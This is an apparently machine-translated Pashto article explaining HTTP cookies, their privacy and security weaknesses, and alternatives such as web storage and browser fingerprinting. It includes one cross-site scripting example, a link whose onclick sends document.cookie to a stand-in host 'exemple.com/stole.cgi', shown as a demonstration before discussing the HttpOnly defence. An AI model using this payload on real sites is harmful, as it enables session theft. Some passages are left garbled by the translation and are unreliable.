د دریمې ډلې کوکیز د ډیرو براوزرونو لخوا بند کیدی شي ترڅو محرمیت زیات کړي او د اعلاناتو تعقیب کم کړي، پرته له دې چې د کاروونکي ویب تجربه منفي اغیزه وکړي. ډیری اعلاناتي ادارې یو اختیار وړاندیز کوي نه ورګډېدل په نښه شوي اعلاناتو ته، په براوزر کې د عمومي کوکي په ترتیب کولو سره کوم چې دا هدف کول غیر فعالوي، مګر دا ډول حل په عملي توګه اغیزمن نه دی، کله چې درناوی وشي، ځکه چې دا عمومي کوکیز ژر تر ژره له منځه ځي کله چې کاروونکي دا کوکیز حذف کړي کوم چې انتخاب لغوه کوي. بهر پریکړه

د کوکیز زیانونه

د محرمیت مسلو سربیره، کوکیز ځینې تخنیکي نیمګړتیاوې هم لري. په ځانګړې توګه، دوی تل په سمه توګه کاروونکي نه پیژني، دوی کولی شي د سایټ فعالیت ورو کړي کله چې په لوی شمیر کې، دوی د امنیتي بریدونو لپاره کارول کیدی شي، او دوی د نمایندګۍ ریاست لیږد، د سافټویر معمارۍ سټایل سره ټکر کوي.

ناڅاپه پیژندنه

که چیرې په کمپیوټر کې له یو څخه ډیر براوزر کارول کیږي، په هر یو کې تل د کوکیز لپاره جلا ذخیره واحد شتون لري. له همدې امله کوکیز یو شخص نه پیژني، مګر د کارونکي حساب، کمپیوټر، او ویب براوزر ترکیب. په دې توګه، هرڅوک کولی شي دا حسابونه، کمپیوټرونه، یا براوزرونه وکاروي چې د کوکیز panoply لري. په ورته ډول، کوکیز د څو کاروونکو ترمنځ توپیر نه کوي چې د ورته کاروونکي حساب، کمپیوټر، او براوزر شریکوي، لکه په "انټرنېټ کیف" یا کوم ځای کې چې د کمپیوټر سرچینو ته وړیا لاسرسی ورکوي.

مګر په عمل کې دا بیان په ډیری قضیو کې غلط دی ځکه چې نن ورځ یو "شخصي" کمپیوټر (یا یو سمارټ فون، یا ټابلیټ، کوم چې ډیر بد دی) په عمده توګه د یو فرد لخوا کارول کیږي، دا د یو ځانګړي شخص په نښه کولو او په نښه کولو کې راځي. د راټولو شویو معلوماتو له لارې شخصي هدف ته رسیږي حتی که چیرې شخص "نوم" نه وي پیژندل شوی.

د کوکیز غلا کول

یو کوکی په شبکه کې د بل کمپیوټر لخوا غلا کیدی شي.

د نورمال عملیاتو په جریان کې ، کوکیز د سرور (یا په ورته ډومین کې د سرورونو یوې ډلې) او د کارونکي کمپیوټر براوزر ترمینځ بیرته لیږل کیږي. څرنګه چې کوکیز کولی شي حساس معلومات ولري (کارن نوم، یو پټنوم چې د تصدیق لپاره کارول کیږي، او نور)، د دوی ارزښتونه باید نورو کمپیوټرونو ته د لاسرسي وړ نه وي. د کوکي غلا د غیر مجاز دریمې ډلې لخوا د کوکیز مداخله یو عمل دی.

کوکیز د سیشن هیجیک کولو په نوم برید کې د پاکټ سنیفیر له لارې غلا کیدی شي. په جال کې ترافیک د لیږلو او ترلاسه کولو پرته د نورو کمپیوټرونو لخوا مداخله او لوستل کیدی شي (په ځانګړي توګه په غیر کوډ شوي عامه Wi-Fi ځای کې). پدې ټرافیک کې کوکیز شامل دي چې د ساده HTTP پروتوکول په کارولو سره غونډو ته لیږل شوي. کله چې د شبکې ټرافيک کوډ شوی نه وي، ناوړه کاروونکي کولی شي په دې توګه د "پاکټ سنیفرز" په کارولو سره په شبکه کې د نورو کاروونکو مخابرات ولولي.

دا ستونزه د HTTPS پروتوکول په کارولو سره د کارونکي کمپیوټر او سرور تر مینځ اړیکې کوډ کولو سره حل کیدی شي. یو سرور کولی شي مشخص کړي خوندي بیرغ د کوکی تنظیم کولو پرمهال؛ براوزر به دا یوازې په خوندي کرښه کې واستوي، لکه د SSL پیوستون.

که څه هم ډیری سایټونه، که څه هم د کاروونکي تصدیق کولو لپاره د HTTPS کوډ شوي مخابرات کاروي (د بیلګې په توګه د ننوتلو پاڼه)، وروسته د سیشن کوکیز او نور معلومات د معمول په توګه، د موثریت دلایلو لپاره د غیر کوډ شوي HTTP اړیکو له لارې لیږل کیږي. برید کوونکي کولی شي په دې توګه د نورو کاروونکو کوکیز مداخله وکړي او په مناسبو سایټونو کې یې انډول کړي یا د کوکی بریدونو کې یې وکاروي.

په سایټ کې سکریپټینګ: یو کوکی چې باید یوازې د سرور او پیرودونکي ترمینځ تبادله شي بل دریمې ډلې ته لیږل کیږي.

د کوکیز غلا کولو بله لاره د سایټونو سکریپټ کول دي او براوزر پخپله ناوړه سرورونو ته کوکیز لیږي چې هیڅکله یې نه ترلاسه کوي. عصري براوزرونه د سرور څخه د کوډ د غوښتل شوي برخو اجرا کولو ته اجازه ورکوي. که چیرې کوکیز ته د چلولو په وخت کې لاسرسی ومومي، د دوی ارزښتونه ممکن په یو ډول سرورونو ته واستول شي چې باید ورته لاسرسی ونلري. د کوکیز کوکیز کول مخکې له دې چې دوی په شبکه کې واستول شي د برید په مخنیوي کې مرسته نه کوي.

دا ډول د سایټ سکریپټینګ عموما په سایټونو کې د برید کونکو لخوا ګمارل کیږي چې کاروونکو ته اجازه ورکوي چې د HTML مینځپانګې پوسټ کړي. په HTML ونډې کې د مطابقت کوډ د یوې برخې په یوځای کولو سره، برید کوونکی کولی شي د نورو کاروونکو څخه کوکیز ترلاسه کړي. د دې کوکیز پوهه د غلا شوي کوکیز په کارولو سره د ورته سایټ سره د نښلولو له لارې کارول کیدی شي، پدې توګه د هغه کارونکي په توګه پیژندل کیږي چې کوکیز غلا شوي.

د داسې بریدونو د مخنیوي یوه لاره د HttpOnly بیرغ کارول دي. دا یو اختیار دی چې د انټرنیټ اکسپلورر 6 نسخه PHP کې د 5.2.0 نسخه راهیسې معرفي شوی کوم چې پالن شوی دی چې کوکی د سکریپټ سره نږدې پیرودونکي ته د لاسرسي وړ نه کړي. په هرصورت، د ویب پراختیا کونکي باید دا د دوی د سایټ پراختیا کې په پام کې ونیسي ترڅو دوی په سایټ کې د سکریپټ کولو څخه معاف وي.

بل امنیتي ګواښ چې کارول کیږي په سایټ کې د تقاضا جعل دی.

رسمي تخنیکي توضیحات کوکیز ته اجازه ورکوي چې بیرته یوازې په هغه ډومین کې سرورونو ته واستول شي چې له کوم ځای څخه دوی رامینځته شوي. په هرصورت، د کوکیز ارزښت د کوکي سرلیکونو پرته د نورو وسیلو په کارولو سره نورو سرورونو ته لیږل کیدی شي.

په ځانګړې توګه، د سکریپټ ژبې لکه JavaScript په عمومي ډول د کوکي ارزښتونو ته د لاسرسي اجازه لري او په انټرنیټ کې هر سرور ته د خپل سري ارزښتونو لیږلو توان لري. دا د سکریپټ کولو وړتیا د ویب پاڼو څخه کارول کیږي چې کاروونکو ته اجازه ورکوي چې د نورو کاروونکو لیدلو لپاره د HTML منځپانګې پوسټ کړي.

د مثال په توګه، یو برید کوونکی چې په example.com ډومین کې کار کوي ممکن یو تبصره پوسټ کړي چې لاندې لینک لري یو مشهور بلاګ ته اشاره کوي چې دوی یې نه کنټرولوي:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

کله چې بل کارونکي په دې لینک کلیک کوي، براوزر د کوډ د آنکلک خاصیت برخه اجرا کوي، نو دا د document.cookie سټینګ د کارن کوکیز لیست سره بدلوي چې د دې پاڼې لپاره فعال دي. له همدې امله، د کوکیز دا لیست د example.com سرور ته لیږل کیږي، او برید کونکی د دې وړتیا لري چې د دې کارن کوکیز راټول کړي.

دا ډول برید د کارونکي اړخ کشف کول ګران دي ځکه چې سکریپټ د ورته ډومین څخه راځي چې کوکي یې تنظیموي، او د ارزښتونو لیږلو عملیات داسې ښکاري چې د دې ډومین لخوا اجازه ورکړل شوې وي. داسې انګیرل کیږي چې دا د مدیرانو مسؤلیت دی چې دا ډول سایټ چلوي ترڅو د ناوړه کوډ د خپرولو مخه ونیسي محدودیتونه وضع کړي.

کوکیز په مستقیم ډول د پیرودونکي اړخ برنامو لکه جاواسکریپټ ته نه لیدل کیږي که دوی د HttpOnly بیرغ سره لیږل شوي وي. د سرور له نظره، یوازینی توپیر دا دی چې د Set-Cookie سرلیک په لیکه کې یو نوی ساحه اضافه شوې چې د HttpOnly تار لري:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

کله چې براوزر داسې کوکي ترلاسه کړي، نو دا باید په نورمال ډول په لاندې HTTP تبادله کې وکاروي، مګر پرته له دې چې دا د مراجعینو په اړخ کې اجرا شوي سکریپټونو ته ښکاره کړي. د HttpOnly بیرغ د کوم رسمي تخنیکي مشخصاتو برخه نه ده، او په ټولو براوزرونو کې نه پلي کیږي. په یاد ولرئ چې اوس مهال د XMLHTTPRequest میتود لخوا د سیشن کوکیز لوستلو او لیکلو مخنیوي لپاره هیڅ لاره شتون نلري.

د منځپانګې تعدیل: یو برید کونکی یو ناسم کوکی سرور ته لیږي، چې ممکن د سرور لخوا لیږل شوي باوري کوکی څخه جوړ شوی وي.

د کوکیز بدلول

هرڅومره ژر چې کوکیز ذخیره کولو ته اړتیا ولري او سرور ته بې بدله بیرته راستانه شي ، برید کونکی کولی شي د کوکیز ارزښت بدل کړي مخکې لدې چې سرور ته بیرته واستول شي. د مثال په توګه، که چیرې یو کوکی ټول ارزښت ولري چې کارونکي یې د پلورنځي د پلورنځي کارټ کې ایښودل شوي توکو لپاره تادیه کوي، د دې ارزښت بدلول سرور د برید کونکي څخه د پیل شوي نرخ څخه لږ چارج کولو خطر سره مخ کوي. د کوکیز ارزښت بدلولو پروسې ته ویل کیږي د کوکي مسمومیت او د کوکي غلا وروسته کارول کیدی شي ترڅو برید دوام ومومي.

د کوکی اوورایډ میتود کې، برید کونکی د براوزر خرابۍ څخه کار اخلي ترڅو سرور ته غلط کوکي واستوي.

په هرصورت، ډیری ویب پاڼې، یوازې د سیشن ID ذخیره کوي - یو تصادفي تولید شوی ځانګړی شمیره چې د سیشن کارونکي پیژندلو لپاره کارول کیږي - پخپله کوکی کې، پداسې حال کې چې نور ټول معلومات په سرور کې زیرمه شوي. په دې حالت کې، دا ستونزه تر ډیره حده حل کیږي.

د ویب سایټونو ترمنځ د کوکی اداره کول

هر سایټ تمه کیږي چې خپل کوکیز ولري، نو یو سایټ باید د دې توان ونلري چې د بل سایټ سره تړلي کوکیز بدل کړي یا جوړ کړي. د ویب براوزر امنیت نیمګړتیا کولی شي ناوړه سایټونو ته اجازه ورکړي چې دا قاعده مات کړي. د دې ډول نیمګړتیا څخه ګټه اخیستنه په عام ډول ویل کیږي کراس سایټ پخلی کول. د دې ډول بریدونو هدف ممکن د سیشن شناخت غلا وي.

کارونکي باید د ویب براوزرونو وروستي نسخې وکاروي چې پکې دا زیانونه په حقیقت کې له مینځه وړل کیږي.

د پیرودونکي او سرور تر مینځ متضاد حالت

د کوکیز کارول ممکن د پیرودونکي حالت او په کوکي کې زیرمه شوي دولت ترمینځ تضاد رامینځته کړي. که چیرې کاروونکي کوکی ترلاسه کړي او د براوزر "شاته" تڼۍ باندې کلیک وکړي، د براوزر حالت عموما د دې استملاک څخه مخکې ورته نه وي. د مثال په توګه ، که چیرې د آنلاین پلورنځي ټوکر د کوکیز په کارولو سره رامینځته شي ، د باسکیټ مینځپانګه نشي بدلیدلی کله چې کارونکي د براوزر تاریخ ته راستون شي: که چیرې کارونکي په خپل ټوکر کې د مقالې اضافه کولو لپاره تڼۍ فشار کړي او په "بیرته راستنیدو" کلیک وکړي. " تڼۍ، مقاله په دې کې پاتې ده. دا ممکن د کارونکي اراده نه وي، څوک چې یقینا غواړي د مقالې اضافه کول لغوه کړي. دا کولی شي د بې اعتبارۍ، ګډوډۍ او کیګونو لامل شي. نو د ویب پراختیا کونکي باید د دې ستونزې څخه خبر وي او د دې په څیر حالتونو اداره کولو لپاره اقدامات پلي کړي.

د کوکي ختمول

دوامداره کوکیز د محرمیت امنیت متخصصینو لخوا تر انتقاد لاندې نیول شوي چې د وخت په تیریدو سره د پای ته رسیدو لپاره ندي ټاکل شوي، په دې توګه ویب پاڼې ته اجازه ورکوي چې کاروونکي تعقیب کړي او د وخت په تیریدو سره خپل پروفایل جوړ کړي. د کوکیز دا اړخ هم د سیشن هیجیک کولو ستونزې یوه برخه ده، ځکه چې غلا شوي دوامداره کوکي د پام وړ مودې لپاره د کاروونکي د تقلید لپاره کارول کیدی شي.

د لوستلو لپاره: غفام: هغوی څوک دي؟ ولې دوی (کله ناکله) دومره ویرونکي دي؟

د کوکیز لپاره بدیلونه

ځینې ​​​​عملیات چې د کوکیز په کارولو سره ترسره کیدی شي د نورو میکانیزمونو په کارولو سره هم ترسره کیدی شي چې کوکیز بای پاس کوي یا حذف شوي کوکیز بیا رامینځته کوي ، کوم چې د کوکیز په پرتله د محرمیت مسلې په ورته ډول رامینځته کوي (یا ځینې وختونه بدتر ځکه چې بیا نه لیدل کیږي).

IP پته

کاروونکي کولی شي د کمپیوټر IP پتې سره تعقیب شي چې پاڼې ته زنګ وهي. دا تخنیک د ورلډ وایډ ویب له معرفي کیدو راهیسې شتون لري ، ځکه چې پاڼې ډاونلوډ کیږي سرور د کمپیوټر IP پتې غوښتنه کوي چې براوزر یا پراکسي چلوي ، که چیرې هیڅ نه کارول کیږي. سرور کولی شي دا معلومات تعقیب کړي که چیرې کوکیز کارول کیږي یا نه. په هرصورت، دا پتې معمولا د کوکیز په پرتله د یو کارونکي په پیژندلو کې لږ باوري دي ځکه چې کمپیوټرونه او پراکسي ممکن د ډیرو کاروونکو لخوا شریک شي، او ورته کمپیوټر ممکن په هره کاري ناسته کې مختلف IP پته ترلاسه کړي (لکه c اکثرا د تلیفون اړیکو لپاره قضیه) .

د IP پتې تعقیب کول په ځینو حاالتو کې د باور وړ کیدی شي، لکه د براډ بانډ اړیکې چې ورته IP پته د اوږدې مودې لپاره ساتي، تر هغه چې بریښنا روانه وي.

ځینې ​​​​سیسټمونه لکه Tor د انټرنیټ د نوم پټ ساتلو لپاره ډیزاین شوي او د IP پتې لخوا تعقیب کول ناممکن یا غیر عملي کوي.

URL

یو ډیر دقیق تخنیک په URLs کې د معلوماتو ځای پرځای کولو پراساس دی. د URL د پوښتنې تار برخه یو تخنیک دی چې معمولا د دې هدف لپاره کارول کیږي، مګر نورې برخې هم کارول کیدی شي. دواړه جاوا سرورلیټ او د پی ایچ پی سیشن میکانیزمونه دا طریقه کاروي که چیرې کوکیز فعال نه وي.

پدې طریقه کې د ویب سرور شامل دي چې د ویب پاڼې لینکونو ته د سټینګ غوښتنې ضمیمه کوي چې دا د براوزر ته لیږل کیږي. کله چې کاروونکی یو لینک تعقیبوي، براوزر سرور ته ضمیمه شوي پوښتنلیک بیرته راګرځوي.

د دې هدف لپاره کارول شوي د پوښتنې تارونه او کوکیز خورا ورته دي، دواړه معلومات په خپله خوښه د سرور لخوا غوره شوي او د براوزر لخوا بیرته راستانه شوي. په هرصورت، ځینې توپیرونه شتون لري: کله چې یو URL چې د پوښتنې تار لري بیا کارول کیږي، ورته معلومات سرور ته لیږل کیږي. د مثال په توګه، که چیرې د یو کارونکي غوره توبونه د یو آر ایل د پوښتنې په کړکۍ کې کوډ شوي وي او کارن دا URL د بریښنالیک له لارې بل کارونکي ته واستوي، نو هغه کارن به هم وکولی شي دا غوره توبونه وکاروي.

له بلې خوا، کله چې یو کاروونکي ورته پاڼې ته دوه ځله لاسرسی ومومي، هیڅ تضمین شتون نلري چې د ورته پوښتنې تار به دواړه وخت وکارول شي. د مثال په توګه، که چیرې یو کارن لومړی ځل د داخلي سایټ پاڼې څخه یوې پاڼې ته راشي او په دویم ځل د بهرنی پاڼې څخه ورته پاڼې ته راشي، د سایټ پاڼې سره د پوښتنې تار په عمومي ډول توپیر لري، پداسې حال کې چې کوکیز ورته وي. .

د پوښتنو تارونو نور زیانونه د امنیت سره تړاو لري: د معلوماتو ساتل چې د پوښتنو تارونو کې سیشن پیژني د سیشن فکسیشن بریدونه ، د پیژندونکي حوالې بریدونه ، او نور استحصال فعالوي یا ساده کوي. د HTTP کوکیز په توګه د سیشن IDs لیږدول ډیر خوندي دي.

پټ فارم ساحه

د سیشن تعقیب یوه بڼه، د ASP.NET لخوا کارول کیږي، د پټو ساحو سره د ویب فارمونو کارول دي. دا تخنیک د معلوماتو لیږدولو لپاره د URL پوښتنو تارونو کارولو سره ورته دی او ورته ګټې او زیانونه لري؛ او که فورمه د HTTP GET میتود سره پروسس شوې وي، ساحې په حقیقت کې د براوزر د URL برخه ګرځي چې دا به د فورمې سپارلو پر مهال واستوي. مګر ډیری فورمې د HTTP POST سره پروسس کیږي، کوم چې د پټو ساحو په شمول د فارم معلومات د اضافي ان پټ په توګه اضافه کیږي چې نه د URL برخه وي او نه د کوکي.

دا طریقه د تعقیب لید څخه دوه ګټې لري: لومړی، د URL په ځای د HTML سرچینې کوډ او POST ان پټ کې ځای پرځای شوي معلومات تعقیب کول به اوسط کارونکي ته اجازه ورکړي چې د دې تعقیب څخه مخنیوی وکړي؛ دوهم، د سیشن معلومات کاپي نه کیږي کله چې کاروونکي یو آر ایل کاپي کوي (د دې لپاره چې پاڼه ډیسک ته خوندي کړي یا د بریښنالیک له الرې لیږل شي، د بیلګې په توګه).

کړکۍ نوم

ټول عام ویب براوزرونه د DOM د window.name ملکیت په کارولو سره د جاوا سکریپټ له لارې خورا لوی مقدار ډیټا (2MB څخه تر 32MB) ذخیره کولی شي. دا ډاټا د سیشن کوکیز پرځای کارول کیدی شي او په ډومینونو کې هم کارول کیږي. تخنیک د JSON شیانو سره یوځای کیدی شي ترڅو د پیرودونکي اړخ سیشن متغیرونو پیچلي سیټ ذخیره کړي.

نیمګړتیا دا ده چې هره جلا کړکۍ یا ټب به په پیل کې یو خالي کړکۍ ولري. کله چې د ټبونو لخوا لټون کول (د کارونکي لخوا پرانستل کیږي) دا پدې مانا ده چې په انفرادي ډول خلاص شوي ټبونه به د کړکۍ نوم ونه لري. برسیره پردې window.name په مختلفو سایټونو کې د لیدونکو د تعقیب لپاره کارول کیدی شي کوم چې د محرمیت اندیښنه رامینځته کولی شي.

په ځینو برخو کې دا د کوکیز څخه ډیر خوندي کیدی شي ، د سرور د نه ښکیلتیا له امله ، پدې توګه دا د سنفیفر کوکیز شبکې برید ته زیان رسونکي کوي. په هرصورت، که چیرې د معلوماتو د ساتنې لپاره ځانګړي تدابیر ونیول شي، دا د نورو بریدونو لپاره زیانمن کیږي، ځکه چې ډاټا په ورته کړکۍ کې پرانستل شوي نورو سایټونو کې شتون لري.

د HTTP تصدیق

د HTTP پروتوکول کې د لاسرسي تصدیق کولو لومړني پروتوکولونه او د لاسرسي تصدیق ډایجسټ شامل دي ، کوم چې یوازې ویب پا pageې ته د لاسرسي اجازه ورکوي کله چې کارونکي د کارن نوم او پټنوم ورکړي. که چیرې سرور ویب پاڼې ته د لاسرسي لپاره د سند غوښتنه وکړي، براوزر یې د کارونکي څخه غوښتنه کوي او یوځل چې ترلاسه شي، براوزر یې ذخیره کوي او په ټولو راتلونکو HTTP غوښتنو کې یې لیږي. دا معلومات د کاروونکي تعقیب لپاره کارول کیدی شي.

ځایی شریک شوی اعتراض

که په براوزر کې د Adobe Flash Player پلگ ان شامل وي، د محلي شریک شوي توکي د کوکیز په څیر د ورته هدف لپاره کارول کیدی شي. دوی کولی شي د ویب پراختیا کونکو لپاره په زړه پوري انتخاب وي ځکه چې:

• د ځایی شریک شوي اعتراض لپاره د ډیفالټ اندازې حد 100 KB دی؛
• امنیتي چکونه د کارونکي کوکي چکونو څخه جلا دي (نو سیمه ایز شریک شوي توکي اجازه ورکول کیدی شي کله چې کوکیز نه وي).

دا وروستی ټکی، کوم چې د کوکیز مدیریت پالیسي د Adobe د محلي ګډو شیانو څخه توپیر کوي پوښتنې راپورته کوي د هغه د محرمیت ترتیباتو د کارونکي لخوا د مدیریت په اړه: هغه باید په دې پوه وي چې د هغه د کوکیز مدیریت د محلي ګډو شیانو په مدیریت باندې هیڅ اغیزه نلري، او برعکس.

د دې سیسټم بله نیوکه دا ده چې دا یوازې د Adobe Flash Player پلگ ان له لارې کارول کیدی شي کوم چې ملکیت دی او د ویب معیار نه دی.

د پیرودونکي اړخ دوام

ځینې ​​ویب براوزرونه د سکریپټ پر بنسټ د دوام میکانیزم ملاتړ کوي، کوم چې پاڼې ته اجازه ورکوي چې په محلي توګه د وروسته کارولو لپاره معلومات ذخیره کړي. انټرنیټ اکسپلورر، د بیلګې په توګه، د براوزر تاریخ، بک مارکونو، په XML کې ذخیره شوي بڼه کې، یا مستقیم ډیسک ته خوندي شوي ویب پاڼې سره د دوامداره معلوماتو ملاتړ کوي. د مایکروسافټ انټرنیټ اکسپلورر 5 لپاره، د DHTML چلندونو له لارې د کاروونکي ډیټا میتود شتون لري.

W3C په HTML 5 کې د پیرودونکي اړخ ډیټا ذخیره کولو لپاره یو نوی جاوا سکریپټ API معرفي کړ چې د ویب ذخیره په نوم یادیږي او هدف یې د تل لپاره کوکیز ځای په ځای کول دي. دا د کوکیز سره ورته دی مګر د خورا ښه ظرفیت سره او د HTTP غوښتنو سرلیک کې د معلوماتو ذخیره کولو پرته. API دوه ډوله ویب ذخیره کولو ته اجازه ورکوي: ځایی ذخیره او سیشن ذخیره، د دوامدار کوکیز او سیشن کوکیز سره ورته (پرته له دې چې د سیشن کوکیز پای ته رسیږي کله چې براوزر بند وي. د غونډو ذخیره ختمیږي کله چې ټب بند شي) په ترتیب سره. د ویب ذخیره د موزیلا فایرفوکس 3.5، ګوګل کروم 5، ایپل سفاري 4، مایکروسافټ انټرنیټ اکسپلورر 8 او اوپیرا 10.50 لخوا ملاتړ کیږي.

یو مختلف میکانیزم معمولا په ویب پاڼو کې د جاوا سکریپټ پروګرامونو په کارولو سره د براوزر کیچ کولو (د ریفریش پرځای په حافظه کې) تکیه کوي. 

د مثال په توګه، یو پاڼه کولی شي ټګ ولري . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

په دې وخت کې، برنامه په کیچ حافظه کې پاتې کیږي او لیدل شوې پاڼه دویم ځل بیا نه پورته کیږي. په پایله کې، که چیرې برنامه یو نړیوال متغیر ولري (د مثال په توګه var id = 3243242؛)، دا پیژندونکی د اعتبار وړ پاتې کیږي او د نورو جاواسکریپټ کوډ لخوا کارول کیدی شي کله چې پاڼه بیا پورته شي، یا یوځل چې د برنامه سره تړلې پاڼه پورته شي. 

د دې میتود لوی زیان دا دی چې د جاواسکریپټ نړیوال متغیر باید جامد وي، پدې معنی چې دا د کوکی په څیر نشي بدلیدلی یا حذف کیدی شي.

د ویب براوزر د ګوتو نښه

د براوزر د ګوتو نښان هغه معلومات دي چې د پیژندنې موخو لپاره د براوزر د تنظیم کولو ترتیباتو په اړه راټول شوي. دا د ګوتو نښې په بشپړ یا جزوي توګه د انټرنیټ کارونکي یا وسیله پیژندلو لپاره کارول کیدی شي حتی کله چې کوکیز غیر فعال وي.

د ویب براوزر تنظیم کولو لومړني معلومات د اوږدې مودې لپاره د ویب سایټ لیدونکو خدماتو لخوا راټول شوي ترڅو د انساني ویب ترافیک دقیق اندازه کولو او د کلیک درغلیو مختلف ډولونه کشف کړي. د مراجعینو اړخ سکریپټینګ ژبو په مرسته، ډیر دقیق معلومات راټولول دي اوس امکان لري.

د دې معلوماتو بدلول په بټ تار کې د وسیلې د ګوتو نښې تولیدوي. په 2010 کې، د بریښنایی فرنټیر فاونډیشن (EFF) د براوزر د ګوتو نښان انټروپي اندازه کړه چې لږترلږه 18,1 ټوټې، او دا د کینوس د ګوتو په نښه کولو کې پرمختګ دمخه و چې دې انټروپي کې 5,7 بټونه اضافه کړل.

په لنډه توګه کوکیز

کوکیز کوچني متن فایلونه دي چې د ویب براوزر لخوا د ویب پاڼې لیدونکي په هارډ ډرایو کې زیرمه شوي او کوم چې د سایټ له لارې د لیدونکي یا د دوی سفر په اړه معلومات ثبتولو لپاره (د نورو شیانو په مینځ کې) کارول کیږي. ویب ماسټر کولی شي پدې توګه د لیدونکي عادتونه وپیژني او د هر لیدونکي لپاره د هغه سایټ پریزنټشن شخصي کړي؛ کوکیز بیا دا ممکنه کوي چې په کور پاڼه کې څومره مقالې وښایئ یا حتی د کوم خصوصي ګوند لپاره د ننوتلو سندونه وساتئ: کله چې لیدونکي سایټ ته راستون شي، نو د هغه لپاره نور اړین ندي چې خپل نوم او پټنوم ټایپ کړي. پیژندل کیږي، ځکه چې دوی په اتوماتيک ډول په کوکي کې لوستل کیږي.

یو کوکی محدود عمر لري، د سایټ ډیزاینر لخوا ټاکل شوی. دوی کولی شي په سایټ کې د ناستې په پای کې پای ته ورسیږي، کوم چې د براوزر تړلو سره مطابقت لري. کوکیز په پراخه کچه کارول کیږي ترڅو د لیدونکو لپاره ژوند اسانه کړي او دوی ته نور اړوند معلومات وړاندې کړي. مګر ځانګړي تخنیکونه دا امکان ورکوي چې یو لیدونکي په څو سایټونو کې تعقیب کړي او پدې توګه د هغه د عادتونو په اړه خورا پراخه معلومات راټول او کراس چیک کړي. دې میتود د کوکیز کارولو ته د څارنې تخنیک په توګه شهرت ورکړی چې د لیدونکو محرمیت سرغړونه کوي ، کوم چې له بده مرغه د غیر تخنیکي دلیلونو لپاره د کارولو ډیری قضیو کې واقعیت سره مطابقت لري یا د کارونکي تمې ته درناوی نه کوي.

د دې مشروع ډارونو په ځواب کې، HTML 5 د مراجعینو اړخ ډیټا ذخیره کولو لپاره یو نوی جاوا سکریپټ API معرفي کوي چې د ویب ذخیره په نوم یادیږي، کوم چې خورا ډیر خوندي او ډیر ظرفیت لري، چې موخه یې د کوکیز ځای په ځای کول دي.

د کوکیز ذخیره کول

د ځینو براوزرونو سره ، کوکی په اسانۍ سره د ترمیم وړ دی ، د نوټ پیډ په څیر ساده متن ایډیټر د دې ارزښتونو په لاسي ډول بدلولو لپاره کافي دی.

کوکیز د براوزر پورې اړه لري په مختلف ډول خوندي شوي:

• د مایکروسافټ انټرنیټ اکسپور هر کوکی په مختلف فایل کې خوندي کوي؛
• موزیلا فای فاکس خپل ټول کوکیز په یوه فایل کې خوندي کوي؛
• اوپرا خپل ټول کوکیز په یوه فایل کې خوندي کوي او کوډ کوي (د سافټویر اختیارونو پرته د دوی ترمیم کول ناممکن دي)؛
• ایپل سفاري خپل ټول کوکیز په یو واحد .plist توسیع فایل کې خوندي کوي. تعدیل ممکن دی مګر خورا اسانه ندي ، پرته لدې چې تاسو د سافټویر اختیارونو ته لاړشئ.

براوزر د ملاتړ لپاره اړین دي یوه دقیقه :

• په ورته وخت کې 300 کوکیز؛
• په هر کوکي کې 4
• په هر کوربه یا ډومین کې 20 کوکیز.